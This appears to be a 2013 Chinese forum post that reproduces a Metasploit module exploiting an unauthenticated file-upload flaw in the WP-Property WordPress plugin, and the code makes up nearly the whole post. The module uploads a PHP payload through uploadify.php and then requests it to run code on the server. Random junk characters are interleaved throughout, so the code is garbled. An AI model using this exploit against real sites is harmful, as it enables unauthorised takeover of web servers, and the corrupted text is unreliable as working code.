WordPress WP-Property PHP 文件上传漏洞
& ~ g3 |& @- B- i, ?5 ^4 z9 I0 v: I! h$ l% j3 J* U& c
## # This file is part of the Metasploit Framework and may be subject to
/ X5 v% M; U& F# `. U
# o( r7 P+ [2 |$ b, N% G$ M2 B. R# redistribution and commercial restrictions. Please see the Metasploit4 l: O' h# u: W& [& u5 T7 m9 B
8 `: H$ y9 `" K# Framework web site for more information on licensing and terms of use., V2 h# ~; O$ \1 Y2 l/ ~
, \' y5 o6 x5 l$ |% h8 u
# http://metasploit.com/framework/ ##
) k& u1 S. c, t
8 _9 `, \2 }# w+ W/ Y8 E% G
# z! C' Z# x. M B7 y* m' R! R8 b, x2 _) O9 ~
8 w* K. Y9 i* _" ~8 x! |& O# Z5 ]$ J8 M2 f8 x& ]
require 'msf/core'
% y; k( w6 n2 Xrequire 'msf/core/exploit/php_exe'
' J- Q5 l/ ^ o! {" a9 j. i
" ], A( T' ^- m! x! iclass Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit: hpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress WP-Property PHP File Upload Vulnerability',
W- i% b' j$ b: L'Description' => %q{: E' V# n9 q6 ~5 Z$ e, Y
This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution. }, 'Author' =>
0 c* w/ w0 q% O9 s[9 J8 g- A u. o* Y: _
'Sammy FORGIT', # initial discovery" [2 a/ Z: }/ D! }/ Y" i
'James Fitts <fitts.james[at]gmail.com>' # metasploit module
) n* C4 {2 C9 G$ i9 Z, ?5 v; p9 l],3 z+ _8 }& Y* E! J2 L$ |
'License' => MSF_LICENSE,9 Q0 n1 a/ {3 [+ L9 c9 M& |4 m
'References' =>( E6 w" q+ X9 Q" ?: E" { I
[ T4 }, V) B2 d R
[ 'OSVDB', '82656' ],
0 K$ T# u6 x r: K, I' X; o[ 'BID', '53787' ],
# b0 n8 @: G! [! K, J[ 'EDB', '18987'],
) ~7 X+ X9 n4 X0 X' E4 T8 x) _0 l1 l$ e[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
3 b$ O G' U6 y l i8 c" u1 P% F# f],
% D$ {9 w, E# |'Payload' =>& s# n( U @0 \* a0 o
{
( Q* _ Z7 D/ J( }7 W M'BadChars' => "\x00",
3 p) h6 f8 }. h/ n t6 R}, O+ M+ X( d1 z& S' j' {$ g7 i
'Platform' => 'php',3 R Z K6 r: m X6 H) X
'Arch' => ARCH_PHP,
( e6 a9 q+ `( ^! n* ^+ \'Targets' =>8 T8 Q \9 |) v( l) k+ `
[
6 L% z! L# M' L" L' v# d[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
: O7 g5 T- s6 G* D/ ]+ P; s- a+ r9 e! A6 i[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]2 i4 b. u1 A1 j$ o' W8 `5 w" @
],
8 ]; p( I( X* z4 L* W3 k'DefaultTarget' => 0,
2 e3 O, a; T' E" J' L'DisclosureDate' => 'Mar 26 2012'))
; W, W( m- T, e8 `+ \3 p1 e: Y) ~8 u o7 S1 \0 X& Q
register_options(/ w! W' O& [$ i8 v& C
[
7 o, j/ A4 @& m0 Y/ WOptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])) {0 ?" Z6 e1 ?' O! z( R; A6 ?
], self.class)
0 C; m2 Z* i$ g4 m* |9 T' T9 ~; K. Xend; k% w( ]6 }1 p9 }( U' f' k
, ^5 Q* X) V) g ?5 Fdef check
/ t' F2 U" V# W# G& g& u1 o1 s' M) q9 _uri = target_uri.path
0 W( @9 c p% ~% M0 A- S9 S7 [uri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET',
[: Z$ @; o6 ]4 {, B'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"& O& O; y. t8 ^- U# U6 w* E& b3 y
})
' K7 J7 M% v0 v' {# Z# X- m+ @" l* i5 i: |
if not res or res.code != 200
* r( K n2 B/ l! ?return Exploit::CheckCode::Unknown
4 d1 l7 |% N$ [end
1 V( H: x- u1 n) t- j/ n) K
5 y7 v4 s0 M( Areturn Exploit::CheckCode::Appears
( ]/ B z. N6 ?end
/ }8 r5 `& ^- u4 k6 z
5 {& p/ R' x: ~$ W/ T9 @, Z5 Ldef exploit2 q3 S; e: U. Z& m* J2 D
uri = target_uri.path
9 V- r& H4 `2 B1 Turi << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" @payload_name = "#{rand_text_alpha(5)}.php" php_payload = get_write_exec_payload(:unlink_self=>true)! I" F, p; P: I5 {, p! A& [
; @( x6 w! l$ ^- Qdata = Rex::MIME::Message.new
2 s+ h' o8 Z8 K* x( I4 ldata.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
/ r* }+ S/ ~! M# tdata.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")7 n) r3 E, x$ G7 f" w' D) R5 w
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')* V4 ]8 t Z. `. k" a6 i
) F) Z" u) T- P4 Y. z# M
print_status("#{peer} - Uploading payload #{@payload_name}")7 G& {9 t. ]0 P3 p, p
res = send_request_cgi({, A V9 q: N# M' A! O @
'method' => 'POST',! }9 e0 N2 g$ K" B
'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
! i+ K r% B$ v: \. D8 f'ctype' => "multipart/form-data; boundary=#{data.bound}",8 o1 Y- M) H0 J2 w
'data' => post_data& r2 `4 G" C) E% r. v7 ]( V0 }
})5 A+ r$ t8 ^: C+ T E
6 h2 V' X4 r; P+ i
if not res or res.code != 200 or res.body !~ /#{@payload_name}/
6 x8 P* D) A( [ R& D/ t9 Xfail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")6 y0 K) i5 j* t3 }7 D9 K/ C
end
. p5 T+ H9 n9 T! Y2 x. @
9 |! S0 H9 D, L( b9 r4 oupload_uri = res.body: V. V$ e: Y) B4 f$ P; G
$ p) ]1 x' n" e6 x7 Lprint_status("#{peer} - Executing payload #{@payload_name}")" _8 Q6 i$ T! |1 \
res = send_request_raw({
! f+ ~2 t, j# Y: C'uri' => upload_uri,9 s/ k/ {6 K3 O/ e v8 s7 Y
'method' => 'GET'
: ?. v! ]' Z6 ]( p2 U0 C& Y7 ]}), f/ g1 |# M+ k5 J$ \# J/ B9 x
end
- [; U0 o4 A5 _5 Q: @" vend/ r( A% E! `. Y9 g' |8 Z
: |% |/ @/ C9 H; F, Y# e9 g! V不要问我这写的是什么 怎么利用 我是说msf.; A- F/ F: e g3 J
: N2 W" q* n! a' f |
发表于 2013-1-4 19:51:30
收藏
支持
反对